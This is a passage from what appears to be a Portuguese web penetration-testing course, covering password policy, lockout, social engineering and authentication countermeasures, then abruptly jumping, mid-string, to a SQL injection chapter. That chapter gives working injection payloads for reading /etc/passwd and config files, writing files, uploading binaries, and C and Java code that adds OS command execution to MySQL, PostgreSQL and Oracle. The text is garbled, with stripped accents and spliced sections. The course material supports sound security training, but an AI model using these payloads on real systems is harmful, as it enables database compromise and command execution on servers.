total cryptanalysis time:
3.05 s
total pre-calculation time: 21.10 s

total chain walk step:
49985001
total false alarm:
907
total chain walk step due to false alarm: 7064898
result
------------------------------------------------------2465d0454ec909560b45b72086604edf
esrrnp240
hex:657372726e70323430
Inexistncia de poltica de senhas forte

Ataques baseados em fora bruta, dicionrio e rainbow tables so executados mais
facilmente, quando a aplicao no implementa uma poltica de senhas fortes, pois os

usurios costumam escolh-las de maneira revisvel.
Em testes caixa-cinza e caixa-branca, primeiramente, deve-se avaliar a qualidade da poltica
de senhas adotada e, somente depois, procurar por fraquezas na maneira como foi implementada. Para testes caixa-preta, a anlise de segurana deve se basear em diretrizes gerais
de senhas seguras, como as discutidas nesta seo, uma vez que a poltica no fornecida
como insumo de trabalho.
Vejamos a seguir os itens que devem constar em uma boa poltica de senhas, a razo de
cada requisito e as tcnicas de teste que podem ser empregadas, para valid-la:
1 Comprimento mnimo.
1 Complexidade.
1 Troca peridica.
1 Histrico.
1 Mximo de trocas por dia.
Comprimento mnimo
Influi diretamente na cardinalidade do espao de senhas e, logo, no nmero de senhas que
precisam ser testadas. Considerando o poder de processamento das placas grficas atuais,
o tamanho mnimo recomendado para senhas de contas de usurios comuns e administrativos de 8 e 14 posies, respectivamente. Esse requisito deve ser testado em telas de
cadastro de contas e alterao de senhas, com auxlio de um proxy de interceptao, para
verificar se o tamanho validado no lado do servidor.
Complexidade
Uma senha forte deve conter elementos de, pelo menos, trs dos seguintes grupos: letras
maisculas, letras minsculas, nmeros e caracteres especiais. Alm disso, no devem
ser utilizadas palavras de dicionrio, nmeros de documento, datas, nomes, nmeros de
1 Bloqueio de contas.
telefone e nem variaes. Quando tudo isso adotado, ataques de dicionrio tornam-se
117
ineficazes, pois as senhas deixam de ser encontradas nas listas de palavras normalmente
empregadas. Para testar esse requisito, deve-se tentar fornecer senhas que no satisfaam
as regras estabelecidas, nas telas de cadastro de contas e alterao de senhas. Se a validao da complexidade for executada no lado cliente da aplicao, um proxy de interceptao deve ser utilizado.
Troca peridica
O principal objetivo desse requisito reduzir o tempo em que uma conta comprometida
pode ser utilizada pelo atacante, nos casos em que o fato no percebido pelo usurio.
A frequncia com que a troca deve ocorrer, todavia, um ponto controverso, pois, se
for muito alta, pode favorecer o esquecimento da senha e criar um novo problema. Por
exemplo, se a cada 15 dias o usurio for obrigado a escolher uma nova senha, as chances de
ele escrev-la em algum lugar so grandes. Desse modo, na prtica, os padres e normas
de segurana adotam um prazo balanceado para troca, que varia de 60 a 90 dias. A melhor
maneira de testar esse item por meio de inspeo de cdigo, em um teste caixa-branca.
Histrico
Impedir que o usurio troque a senha, para qualquer uma das n ltimas que tenha utilizado,
visa evitar que credenciais comprometidas voltem a ser empregadas e que a senha atual seja
mantida, por meio de trocas imediatas. Para validar esse requisito, basta tentar alterar a senha
para um dos valores contidos no histrico e observar se o sistema probe ou no a operao.
Mximo de trocas por dia

Limitar o nmero de vezes que um usurio pode trocar a senha no mesmo dia visa atuar
em conjunto com o histrico, para que a senha atual no seja mantida, por meio de trocas
imediatas. Por exemplo, se o sistema mantm um histrico de vinte senhas e somente uma
alterao diria permitida, so necessrios vinte dias, para que se retorne senha original.
Sem a ltima restrio, porm, o mesmo resultado pode ser obtido quase que instantaneamente. O teste que deve ser realizado, nesse caso, consiste em trocar a senha vrias vezes
consecutivas, contabilizando o total permitido. Se esse for um nmero muito alto, pelo
exposto acima, conclui-se que a aplicao vulnervel.
Bloqueio de contas
Quando uma srie de tentativas malsucedidas de autenticao com a mesma conta for
detectada, ela deve ser imediatamente bloqueada, pois um ataque de fora bruta pode
estar sendo executado. Aps um tempo, que deve aumentar a cada ocorrncia, a conta deve
ser automaticamente destravada, para evitar ataques de negao de servio contra os usurios da aplicao. Alternativamente, o desbloqueio pode ser realizado pelo administrador
do sistema, mediante solicitao formal do usurio. A validao desse controle consiste
118
na submisso consecutiva de senhas incorretas para uma dada conta e a observao do

comportamento da aplicao frente situao. Note, entretanto, que isso pode resultar em
perda de acesso e, por isso, no recomendvel em testes caixa-preta, salvo se for executado ao final do trabalho.
Negao de servio direcionada a usurios

Uma poltica inadequada de bloqueio de contas pode permitir ataques de negao de
servio contra os usurios da aplicao. Em alguns casos, isso pode ter por objetivo favorecer o atacante, alm de causar incmodo vtima. Por exemplo, consideremos uma
aplicao de leilo eletrnico, que exibe os identificadores dos usurios participantes,
em ordem decrescente do lance efetuado. Alm disso, vamos supor que o sistema bloqueia contas de usurio, aps trs tentativas invlidas de autenticao.
Se um usurio malicioso quiser aumentar as chances de obter um determinado item, ele
pode proceder da seguinte maneira (Stuttard e Pinto, 2007):
1. O usurio malicioso cria um programa para monitorar a pgina do item desejado.
2. Sempre que um usurio efetuar um lance, o programa trava a conta correspondente, por
meio de tentativas deliberadamente invlidas de autenticao, com o identificador do concorrente. Isso faz com que a vtima perca tempo, tentando desbloquear a conta que utiliza.
3. Prximo da hora de encerramento do leilo, o programa realiza um lance automtico, com
valor um centavo maior que o oferecido at ento, desde que no ultrapasse um limiar
pr-definido pelo atacante.
4. Se ningum conseguir efetuar um lance adicional, no pouco tempo restante, o ataque
bem-sucedido e o objeto, adquirido.

Observe que a grande vulnerabilidade desse cenrio que a aplicao revela a lista com-
pleta de identificadores dos usurios que concorrem pelo mesmo item. Se o atacante
no tivesse essa informao, no seria capaz de bloquear os usurios necessrios.
Engenharia social
Mesmo hoje em dia, o maior problema de sistemas de autenticao de usurios no de
origem tcnica, mas, sim, de natureza humana.

Por maior que seja a divulgao dos cuidados que devem ser tomados pelas pessoas no
mundo virtual, muitas delas ainda so vtimas de golpes enviados por correio eletrnico ou
disseminados por sites nada idneos. Todos os dias, dezenas de mensagens no solicitadas chegam s caixas de correio, com o objetivo de convencer o usurio a visitar alguma
pgina maliciosa ou abrir os anexos recebidos. Para isso, exploram a curiosidade e o medo,
artistas, desastres naturais e escndalos sexuais sempre despertam a ateno das pessoas,
que tentam visualiz-las a qualquer custo, expondo-se a riscos desnecessrios. A Figura 3.23,
por sua vez, ilustra uma pgina falsificada de um banco, que supostamente perdeu a base
de usurios e requer, por isso, que recadastrem a cartela de chaves de segurana e a senha
do carto, sob pena de terem a conta bloqueada.
caractersticos dos seres humanos, por meio de engenharia social. Por exemplo, fotos sobre
119
Algumas vezes, o contratante de um teste de invaso solicita que a postura de segurana
de seus colaboradores seja avaliada, como uma maneira de validar a eficcia da poltica de segurana vigente. Nesse contexto, desde que se tenha autorizao por escrito,
tcnicas de engenharia social, como as implcitas nos cenrio acima, devem ser empregadas. Vejamos alguns testes que podem ser realizados:
1 Se no houver um processo formal para redefinio de senhas esquecidas, pode-se

ligar para a equipe de suporte, simulando a situao, como se fosse um usurio
vlido. Dependendo do treinamento em segurana do atendente, h uma boa chance
de ele fornecer uma senha, que permita conectar-se aplicao, pela porta principal.
1 Alternativamente, possvel ligar para um usurio, dizendo ser do suporte, e solicitar

que ele confirme a senha por telefone, devido a um problema ocorrido na base de
autenticao. Se a poltica de segurana for efetiva, o colaborador no informar
nada e avisar a equipe de resposta a incidentes.
1 A ltima abordagem consiste no envio ao usurio de um software malicioso que

capture as teclas digitadas ou que permita se conectar remotamente estao que
utiliza. Em qualquer dos casos, cedo ou tarde, as credenciais da vtima podero ser
obtidas. importante notar que, ao final do trabalho, o software esprio dever ser
removido do ambiente do cliente.
Vulnerabilidades em mecanismos de autenticao
Que tipos de vulnerabilidades podem ser encontrados em mecanismos de autenticao?
Contramedidas
Os seguintes controles devem ser considerados para evitar vulnerabilidades no mecanismo de autenticao:
1 No permita identificadores de usurio repetidos na aplicao.

1 Remova, das reas acessveis pelo servidor web, arquivos que contenham credenciais
de acesso ao sistema e infraestrutura subjacente.
120
Figura 3.23
Site falsificado,
para captura de
senha e cartela
de segurana.
1 Remova, das pginas HTML e dos arquivos de cdigo-fonte, comentrios que conte-
nham informaes de autenticao.
1 Desabilite contas pr-definidas da aplicao e das plataformas que a suportam, como

bancos de dados, servidores web, sistemas operacionais etc.
1 Implemente, na aplicao e nas plataformas subjacentes, polticas de senhas fortes

que considerem tamanho mnimo, complexidade, troca peridica, histrico, mximo
de trocas dirias e travamento de conta por tentativas malsucedidas de autenticao.
Nesse caso, o desbloqueio deve ocorrer, automaticamente, aps um perodo de
tempo pr-determinado, que deve aumentar a cada ocorrncia.
1 Para contas criadas automaticamente pela aplicao, atribua uma senha inicial aleatria e obrigue a troca no primeiro acesso.
1 Informe ao usurio, logo no incio de uma sesso, a data e hora da ltima vez em que
se conectou com sucesso.
1 Quando a autenticao falhar, exiba apenas uma mensagem de erro genrica. Nunca
informe se o identificador de usurio no existe ou se a senha incorreta. Adote
estratgia similar para mecanismos de recuperao de senha.
1 Em mecanismos de recuperao de senha, empregue perguntas secretas, cujas

respostas no sejam facilmente dedutveis ou encontradas na internet. Limite o
nmero de tentativas para acerto das questes, para evitar ataques de fora bruta.
Em caso de sucesso, envie uma mensagem automtica para o endereo de e-mail
pr-cadastrado, contendo um link para uma pgina efmera individualizada, na qual
a nova senha poder ser definida. Notifique a alterao ao usurio, por meio de nova
mensagem de correio eletrnico.
1 Se a aplicao possuir uma funcionalidade Lembrar Usurio, nunca memorize credenciais completas, que o permitam conectar-se aplicao, sem fornecimento de senha.
1 Nunca confie em parmetros que podem ser alterados pelos usurios para decidir se
esto ou no autenticados.
1 Fornea a pgina de autenticao ao usurio somente por meio do protocolo HTTPS.

1 Sempre transmita credenciais de acesso por tneis protegidos criptograficamente.
1 Nunca submeta formulrios de autenticao por meio do mtodo GET. Igualmente,
no passe credenciais pela URL em processos de redirecionamento.
ticas de segurana conhecidas.
1 Se um erro inesperado ocorrer, a aplicao deve permanecer em um estado seguro.

1 Valide a entrada imediatamente antes de process-la, de modo que o formato esperado seja respeitado.
1 No exiba mensagens de erro contendo informaes sobre as plataformas e tecnologias empregadas.
1 Exija sempre o fornecimento da senha atual para efetuar a troca de senha de um usurio.
1 Em mecanismos de autenticao baseados em mltiplos fatores, sempre verifique
que todas as etapas esperadas foram corretamente validadas. Toda informao relacionada ao processo de autenticao deve ser mantida no servidor, exclusivamente.
1 Configure o lado servidor dos tneis criptogrficos, de acordo com as melhores pr-
121
1 Nunca armazene as senhas em claro. Em vez disso, adicione a elas 128 bits de salt
e guarde apenas o hash criptogrfico do valor resultante, como validador de cada
conta. Para os casos em que o nmero de senhas muito pequeno, empregue cifras
probabilsticas, em vez de funes de hash criptogrficas, para evitar ataques de
varredura completa do domnio.
1 No exiba um identificador de usurio para outras pessoas que no ele prprio.

1 Implante uma poltica de segurana e conscientize todos os usurios.
1 Registre em trilhas de auditoria todas as tentativas vlidas e invlidas de autenticao,
incluindo o identificador de usurio, data, hora, aplicao e endereo de origem.
122
Atividade 1 Tecnologias de autenticao
Esta atividade tem por objetivo abordar tecnologias de autenticao empregadas em aplicaes web, dando base para que o aluno realize as atividades de descoberta de vulnerabilidades e explorao. Para inici-la, carregue as mquinas virtuais do aluno e do servidor
(Fedora) e execute os roteiros na primeira delas.
Avaliao dos aspectos de autenticao

Acesse a pgina web de onde trabalhe e avalie os seguintes aspectos relacionados ao processo de autenticao de usurios:
1 Qual o protocolo utilizado no carregamento da pgina de autenticao?

1 Que tipo de mecanismo de autenticao empregado?
1 Como o processo de recuperao de senhas?
1 A aplicao utiliza uma poltica de senhas fortes? Quais so os critrios adotados?
1 Como as senhas so protegidas durante o armazenamento?
1 As credenciais de acesso so enviadas por canal seguro?
1 Existe uma funcionalidade para lembrar o usurio?
Autenticao mtua de entidades em SSL/TLS

O propsito desta atividade ilustrar para o aluno como a identidade do usurio comprovada,
quando a opo de autenticao mtua de entidades dos protocolos SSL/TLS est habilitada.
2. Acesse https://mauth.esr.rnp.br/.
3. Na janela que aparece, escolha Wrong User e clique em Ok. Observe que uma pgina gen-
rica de erro foi exibida.

4. Pressione Ctrl + Shift- + Del para limpar o histrico do Firefox, selecione Everything e clique
em Clear Now.
5. Clique no cone de recarregar a pgina.
6. Na janela que aparece, escolha ESR User e clique em Ok. Veja que o usurio foi autenticado
7. Feche o navegador.
Atividade 2 Descoberta de vulnerabilidades e explorao

O propsito desta atividade introduzir ao aluno os mtodos que podem ser utilizados para
a descoberta e explorao de vulnerabilidades, em mecanismos de autenticao. Todos os
exerccios devem ser realizados na mquina virtual do aluno e altamente recomendado
que se tente traar a estratgia de explorao antes de seguir o roteiro fornecido.
com sucesso, porm, nenhuma senha foi fornecida.
123
Uso de informaes obtidas nas fases de reconhecimento e mapeamento

Neste exerccio, informaes encontradas nas etapas de reconhecimento e mapeamento
so utilizadas para se obter acesso ao sistema.
Parte I Arquivos contendo credenciais de acesso
2. Visualize o contedo do arquivo robots.txt, da aplicao Mutillidae:
~$ curl http://mutillidae.esr.rnp.br/robots.txt
Observe que h um diretrio /passwords e um arquivo config.inc.
5. Acesse http://mutillidae.esr.rnp.br/passwords.
6. Visualize o contedo do arquivo accounts.txt.
7. Anote as senhas dos usurios admin e john.
8. Acesse http://mutillidae.esr.rnp.br.
9. Clique em Login.
10. Tente se conectar como o usurio admin e veja a mensagem no topo da tela.
11. Clique novamente em Login e repita o passo anterior, para o usurio ed.
Parte II Pistas no cdigo

12. Clique no marcador WebGoat e fornea guest e guest, quando usurio e senha
forem solicitados.
14. No menu, ao lado esquerdo, clique em Code Quality e, depois, em Discover Clues in the HTML.
15. Visualize o cdigo-fonte da pgina, pressionando Ctrl + U.
16. Pressione Ctrl + F, para realizar uma busca, e digite , 8
0,1,0) from dual-O pacote vulnervel DBMS_EXPORT_EXTENSION pertence ao usurio SYS do Oracle e, assim, a
funo criada como sendo dele. Consequentemente, para que o usurio da aplicao possa
invoc-la, deve-se executar um GRANT, concedendo a ele privilgio de execuo da funo:

266
EXECUTE IMMEDIATE GRANT EXECUTE ON FREAD TO SYSTEM 8

;END;;END;--, 8
0,1,0) from dual-Feito tudo isso, fica fcil ler arquivos do servidor de banco de dados, como se v no prximo
exemplo, que extrai o arquivo /etc/passwd:
and 1=2 union select 1,sys.fread(/etc,passwd),null from dual-O processo de escrita de arquivos segue curso similar, sendo apenas necessrio abrir o
arquivo em modo de escrita (W) e utilizar o comando PUT ou derivados.
PostgreSQL
O comando COPY pode ser utilizado, em PostgreSQL, para leitura e escrita de arquivos
binrios, em formato prprio do SGBD e textuais. O acesso ao sistema de arquivos est

restrito aos privilgios da conta de sistema operacional que executa o SGBD, e no h
restrio quanto sobrescrita de arquivos, diferentemente de como ocorre em MySQL.
Um ponto importante a ser observado que toda transferncia efetuada sempre entre
arquivos e tabelas do banco de dados.
Consequentemente, o primeiro passo para a leitura de um arquivo consiste na escolha da tabela
que receber os dados ou na criao de uma tabela temporria, como no exemplo abaixo:
; create table tmp (num serial, data text)-Em seguida, deve-se carregar o arquivo desejado na tabela alvo:
; copy tmp (data) from /var/lib/pgsql/data/pg_hba.conf-Finalmente, os dados podem ser extrados por meio da tcnica baseada em UNION:
and 1=2 union select num,data,null from tmp order by 1-A escrita de arquivos, por sua vez, direta, bastando especificar uma tabela ou utilizar um
SELECT como fonte de dados:
; copy books to /tmp/out.txt csv-No vetor acima, a clusula CSV faz com que os campos das linhas da tabela books sejam
separados por vrgula quando gravados no arquivo /tmp/out.txt.
Observe agora como se armazenam dados a partir de uma consulta:
Todas essas tcnicas apresentam uma limitao, apontada pelo prprio Leidecker
(2007), que se resume na impossibilidade de manipular arquivos binrios com formato

arbitrrio. Uma soluo para esse problema foi introduzida por Guimares (2009) e se
baseia nas funcionalidades de manipulao de objetos grandes.
Embora esse novo mtodo represente um grande avano em relao aos anteriores, o tama-
; copy (select version()) to /tmp/out.txt--
nho mximo de arquivo que pode ser copiado para o servidor de apenas 8192 bytes.
267
De acordo com o roteiro descrito por Guimares (2009), a etapa inicial consiste na codificao em BASE64 do arquivo a ser copiado. Considere, por exemplo, que este se chame lib.so:
~$ base64 lib.so > out.b64

Em seguida, uma tabela auxiliar deve ser criada, contendo um campo do tipo text:
; create table tmp (data text)-O arquivo em BASE64 deve, ento, ser inserido na tabela de suporte:
; insert into tmp values ( 8

f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAcAgAADQAAAAUEAAAAAAAADQAIAAFACgAGQ 8
AYAAEAAAAAAAAAAAAAAAAAAAAYDgAAGA4AAAUAAAAAEAAAAQAAABgOAAAYHgAAGB4AA 8
AABAAAIAQAABgAAAAAQAAACAAAAMA4AADAeAAAwHgAAyAAAAMgAAAAGAAAABAAAAAQA 8
...
MEAAAAIAAAAAwAAABgfAAAYDwAACAAAAAAAAAAAAAAABAAAAAAAAADGAAAAAQAAADAA 8
AAAAAAAAGA8AACwAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAMAAAAAAAAAAAAAAEQPAAD
8
PAAAAAAAAAAAAAAABAAAAAAAAAA==)-Prossegue-se criando um objeto do tipo large, identificado por um nmero arbitrrio:
; select lo_create(1000)-Agora, o objeto deve ter a parte de dados atualizada, com os bytes originais do arquivo
sendo copiados para o servidor. Isso feito manipulando a linha da tabela pg_largeobject,
cujo loid seja igual ao identificador escolhido no passo anterior:
; update pg_largeobject set data = (select decode(data,base64) 8

from tmp) where loid=1000-Por fim, o arquivo pode ser criado no servidor por meio da funo lo_export():
; select lo_export(1000,/tmp/lib.so)--
SQL Server
268
A leitura de arquivos em SQL Server realizada de maneira similar suportada pelo SGBD
PostgreSQL, mas o comando BULK INSERT utilizado no lugar. A transferncia tambm

depende de uma tabela, e a fonte de dados pode ser local ao prprio servidor ou remota,
especificada por um UNC, no formato \\servidor\compartilhamento\caminho\arquivo.
Diversas opes so fornecidas pelo comando por meio da clusula WITH para descrever o
formato do arquivo de entrada, e, se nenhum deles for empregado, os valores padronizados
so assumidos. Exemplos de opes incluem delimitadores de campos e de fim de linha.
Assim como em PostgreSQL, o primeiro passo a criao de uma tabela temporria:
UNC
Universal Naming
Convention. Define
o formato de nomes,
para acesso a recursos
disponibilizados em
uma rede local.
; create table tmp (data varchar(8000))-A etapa seguinte consiste no carregamento do contedo do arquivo, por exemplo, iis6.log,
na tabela recm-criada:
; bulk insert tmp from c:\windows\iis6.log-Por fim, os dados so extrados por meio da tcnica UNION:
and 1=2 union all select null,data,null from tmp-O SQL Server no possui uma contraparte do BULK INSERT diretamente como um
comando, sendo necessrio empregar um utilitrio externo, chamado de bcp. Esse

aplicativo permite importar e exportar dados de um banco SQL Server e chamado via
linha de comando.
Assim, para invoc-lo de dentro do SGBD, deve-se utilizar o procedimento estendido xp_
cmdshell, que permite executar programas arbitrrios. Como esse o tema de uma seo
adiante, por ora, vejamos apenas exemplos de uso a partir do sistema operacional:
C:\> bcp select * from master..secret_table queryout 8

c:\temp\tst.txt -c -Usa -P
Starting copy...
3 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.): total
C:\> type c:\temp\tst.txt

Secret text
100000.0000
Not so secret text
300.0000
Top secret text 100000000.0000

No caso acima, a fonte de dados um comando SELECT, que deve sempre ser acompanhado
da opo queryout. O arquivo de destino especificado em seguida juntamente com a
denciais devem ser informadas pelas opes -U e -P.
Quando todas as linhas da tabela so exportadas, sem exceo, mais fcil utilizar a
segunda sintaxe, abaixo mostrada:
C:\> bcp master..secret_table out c:\temp\tst2.txt -c -Usa -P
opo -c, que indica que os dados devem ser tratados como caracteres. Finalmente, as cre-
Starting copy...
269
3 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.): total
A diferena desse formato que a tabela especificada diretamente, como argumento do

comando, e a opo out deve ser empregada, em vez de queryout.
Funo definida pelo usurio

As funcionalidades originais de um sistema gerenciador de bancos de dados podem ser
estendidas, por meio de funes definidas pelo usurio (UDF, do ingls User Defined Func-
UDF
tion), as quais podem ser chamadas como parte de uma expresso, em um comando SQL.
No contexto de bancos
de dados SQL, uma
funo definida pelo
usurio, que estende as
funcionalidades nativas
de um SGBD e que
pode ser usada como
uma expresso.
De modo geral, o comando CREATE FUNCTION empregado para a criao dessas extenses, que podem ser escritas em diversas linguagens de programao, dependendo do
SGBD alvo. Em alguns casos, possvel cri-las, tambm, a partir de bibliotecas compartilhadas presentes no sistema de arquivos (Guimares, 2009).
MySQL
MySQL permite a criao de funes de usurio, implementadas em linguagem C e
compiladas como bibliotecas dinmicas, que devem ser armazenadas, a partir da verso
5.1.19, no diretrio indicado pelo parmetro plugin_dir, definido no arquivo my.cnf. Nas
verses anteriores, era possvel coloc-las em qualquer pasta que fosse pesquisada pelo
sistema operacional em busca de bibliotecas compartilhadas. Uma dificuldade que se
tem hoje em dia, para a criao de tais funes via injeo de SQL, que o diretrio que
deve hospedar a biblioteca, normalmente, no pode ser escrito pela conta do MySQL.
Alm disso, para injetar o comando CREATE FUNCTION, a aplicao e a verso do SGBD
devem suportar comandos empilhados.
O exemplo dado a seguir, distribudo como software livre, por meio de licena GPL Lesser
General Public License, obra de Bernardo Damele Guimares, criador do sqlmap, e de
Roland Bouman. O cdigo deles, apresentado parcialmente na Figura 6.41, estende a biblioteca lib_mysqludf_sys, parte do repositrio do MySQL, e adiciona ao todo seis funes,
incluindo sys_exec() e sys_eval(), para execuo de comandos do sistema operacional.
A biblioteca pode ser compilada para ambientes Windows e Linux, tendo em mente que os
cabealhos e bibliotecas do MySQL precisam estar instalados.
270
...
char* sys_eval(
UDF_INIT *initid
, UDF_ARGS *args
, char* result
, unsigned long* length
, char *is_null
, char *error
){
FILE *pipe;
char *line;
unsigned long outlen, linelen;
line = (char *)malloc(1024);

result = (char *)malloc(1);
outlen = 0;
result[0] = (char)0;
pipe = popen(args->args[0], r);
while (fgets(line, sizeof(line), pipe) != NULL) {

linelen = strlen(line);
result = (char *)realloc(result, outlen + linelen);
strncpy(result + outlen, line, linelen);
}
Figura 6.41
Cdigo-fonte da
funo sys_eval(),
que estende a
funcionalidade do
MySQL, permitindo execuo de
programas de linha
de comando.
pclose(pipe);
if (!(*result) || result == NULL) {
outlen = outlen + linelen;
*is_null = 1;
271
} else {
result[outlen-1] = 0x00;
*length = strlen(result);
}
return result;
}
...
A gerao do binrio pode ser feita por meio do seguinte comando:
~$ gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c 8

-o lib_mysqludf_sys.so
Em seguida, o comando strip deve ser executado para a remoo dos smbolos e consequente reduo do tamanho da biblioteca. O objetivo facilitar o envio para o servidor de
banco de dados, por meio da injeo de SQL (Guimares, 2009).
~$ strip -sx lib_mysqludf_sys.so

A prxima etapa determinar o diretrio em que a biblioteca deve ser gravada no servidor
de banco de dados. Supondo que a verso instalada de MySQL seja a 5.1.56, como j vimos,
isso definido pelo valor do parmetro de inicializao plugin_dir. Este pode ser obtido a
partir do dicionrio de dados, por meio da seguinte injeo de SQL:
and 1=2 union select 1,null,variable_value,null,null,null from 8

information_schema.global_variables where variable_name=PLUGIN_
DIR#
Que resulta no valor /usr/lib/mysql/plugin. Por padro, esse diretrio no pode ser escrito
por todos os usurios e, assim, para o ataque funcionar, necessrio escalar os privilgios
da conta de sistema operacional utilizada pelo MySQL. Para a realizao dessa prova de con-
ceito, entretanto, os privilgios necessrios foram diretamente concedidos conta mysql.
272
A gravao do arquivo no servidor emprega o comando SELECT ... INTO DUMPFILE, visto
anteriormente. Observe que, por se tratar de um arquivo binrio, a biblioteca deve ser
codificada como uma cadeia de valores hexadecimais antes de ser transferida. Isso pode ser
realizado, facilmente, com auxlio dos utilitrios xxd e tr, para Linux. Enquanto o primeiro
cuida do processo de codificao, o ltimo remove os caracteres de fim de linha, gerados
pelo programa xxd:
~$ xxd -p lib_mysqludf_sys.so | tr -d \n > out.hex
Em seguida, a partir do arquivo gerado, out.hex, deve-se construir o vetor de injeo:
and 1=2 union select ,, 8

0x7f454c4601010100000000000000000003000300010000007008000034000000141 8
000000000000034002000050028001900180001000000000000000000000000000000 8
180e0000180e0000050000000010000001000000180e0000181e0000181e000000010 8
00008010000060000000010000002000000300e0000301e0000301e0000c8000000c8 8
...
00f80e00000c00000000000000000000000400000004000000b800000001000000030 8
00000041f0000040f00001400000000000000000000000400000004000000c1000000 8
0800000003000000181f0000180f00000800000000000000000000000400000000000 8
000c6000000010000003000000000000000180f00002c000000000000000000000001 8
0000000100000001000000030000000000000000000000440f0000cf0000000000000 8
,,, into dumpfile /usr/lib/mysql/plugin/lib_mysqludf_sys.so#
Para finalizar o processo, basta criar as funes no MySQL, referenciando a biblioteca
recm-copiada para o servidor:
; 8
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 8
lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_get RETURNS string SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_set RETURNS int SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_exec RETURNS int SONAME lib_mysqludf_sys.so; 8
CREATE FUNCTION sys_eval RETURNS string SONAME lib_mysqludf_sys.so 8 ;
CREATE FUNCTION sys_bineval RETURNS int SONAME lib_mysqludf_sys.
so#
Percebe-se que esse passo requer o suporte a comandos empilhados, o que no to fcil
de encontrar nos sistemas em produo baseados em MySQL.
Finalizando, o exemplo abaixo ilustra a execuo do comando ping contra a mquina com
union select 1,null,sys_eval(ping -c 4 192.168.213.10),null, 8

null,null#
endereo IP 192.168.213.10, por meio de uma chamada a sys_eval(), via injeo de SQL:
273
Oracle
Em Oracle, possvel criar funes definidas por usurio nas linguagens PL/SQL e Java,
sendo um exemplo da primeira a rotina que vimos para a leitura de arquivos. Nessa
seo, para cobrir todas as possibilidades, uma funo em Java que executa comandos
no sistema operacional apresentada na Figura 6.42. Assim como no caso anterior,
necessrio injetar todo o cdigo explorando uma rotina vulnervel, escrita em PL/SQL,
sem a qual o ataque no funciona.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED JCMD AS

import java.lang.*;
import java.io.*;
public class JCMD {

public static String execCmd(String command) throws IOException
{
String line = ;
StringBuffer sb = new StringBuffer();
Process p = Runtime.getRuntime().exec(command);
DataInputStream dis = new DataInputStream(p.getInputStream());
while ((line = dis.readLine()) != null) {

sb.append(line + \n);
}
dis.close();
return sb.toString();
}
274
A criao da classe Java JCMD representa apenas parte da tarefa, restando, ainda, a criao
da funo propriamente dita e a concesso de privilgios aos usurios. Os comandos que
realizam essas aes esto ilustrados a seguir:
CREATE OR REPLACE FUNCTION JCMDF (command IN VARCHAR2)

RETURN VARCHAR2
AS LANGUAGE JAVA
NAME JCMD.execCmd(java.lang.String) return java.lang.String;
Figura 6.42
Cdigo-fonte Java
de funo para execuo de comandos
em Oracle.
GRANT EXECUTE ON JCMDF TO PUBLIC;

Feito tudo isso, j possvel executar comandos no sistema operacional:
and 1=2 union select null,replace(sys.jcmdf(/bin/ls -l /), 8

chr(10),<BR>),null from dual-A funo REPLACE utilizada acima para incluir as quebras de linha no HTML gerado, e o
resultado da injeo est ilustrado na Figura 6.43.
PostgreSQL
O SGBD PostgreSQL permite a criao de funes de usurio, implementadas em lin-
guagem C e compiladas como bibliotecas dinmicas, que podem ser armazenadas em

qualquer diretrio que a conta do servidor consiga acessar. Isso facilita muito a tarefa
de injeo, pois o arquivo pode ser gravado no diretrio /tmp, por exemplo, que pode
ser escrito por todos os usurios do sistema. Adicionalmente, a explorao favorecida
mais ainda pelo suporte nativo a comandos empilhados.
Nas verses anteriores a 8.1, inclusive, era possvel definir funes que utilizavam bibliotecas nativas do sistema operacional, como a libc. A partir da verso 8.2, isso no mais possvel, pois um bloco mgico deve estar presente em todas as bibliotecas compartilhadas para
que possam ser carregadas (Leidecker, 2007; Guimares, 2009). Portanto, esse requisito
deve ser devidamente atendido para que o ataque funcione corretamente.
O cdigo que ser usado como exemplo, mostrado parcialmente na Figura 6.44, tambm
obra de Bernardo Guimares e distribudo como software livre, por meio de licena GPL
Lesser General Public License. Essa biblioteca cria quatro funes, que podem ser utilizadas
para a execuo de programas de linha de comando e para a leitura de arquivos. Alm disso,
possvel compil-la para ambientes Windows e Linux, tendo em mente que os cabealhos
e bibliotecas do PostgreSQL precisam estar instalados.
Figura 6.43
Execuo
do comando ls -l /,
por meio de
chamada a UDF.
275
...
PG_FUNCTION_INFO_V1(sys_exec);
#ifdef PGDLLIMPORT
extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
#else
extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
#endif
text *argv0 = PG_GETARG_TEXT_P(0);
int32 result = 0;
char *command;
command = text_ptr_to_char_ptr(argv0);
result = system(command);
free(command);
PG_FREE_IF_COPY(argv0, 0);
PG_RETURN_INT32(result);
}
...
A gerao do binrio pode ser feita por meio do seguinte comando:
~$ gcc -Wall -I/usr/include/pgsql/server -Os -shared 8

lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
Em seguida, o comando strip deve ser executado, para remoo dos smbolos e consequente reduo do tamanho da biblioteca. O objetivo facilitar o envio para o servidor de
banco de dados, por meio da injeo de SQL (Guimares, 2009).
276
~$ strip -sx lib_postgresqludf_sys.so

Para enviar o arquivo ao servidor, por se tratar de arquivo binrio, a tcnica baseada em
objetos grandes deve ser empregada. O aluno pode seguir, exatamente, os passos descritos
na seo de manipulao de arquivos e depositar a biblioteca no diretrio /tmp.
Na prxima etapa, as funes devem ser criadas no banco de dados, referenciando a biblioteca recm-copiada para o servidor:
Figura 6.44
Cdigo fonte da
funo sys_exec(),
que tem por
objetivo estender o
PostgreSQL, permitindo execuo de
programas de linha
de comando.
; 8
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 8
/tmp/lib_postgresqludf_sys.so, sys_exec LANGUAGE C RETURNS NULL
8
ON NULL INPUT IMMUTABLE; 8
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 8
/tmp/lib_postgresqludf_sys.so, sys_eval LANGUAGE C RETURNS NULL
8
CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 8
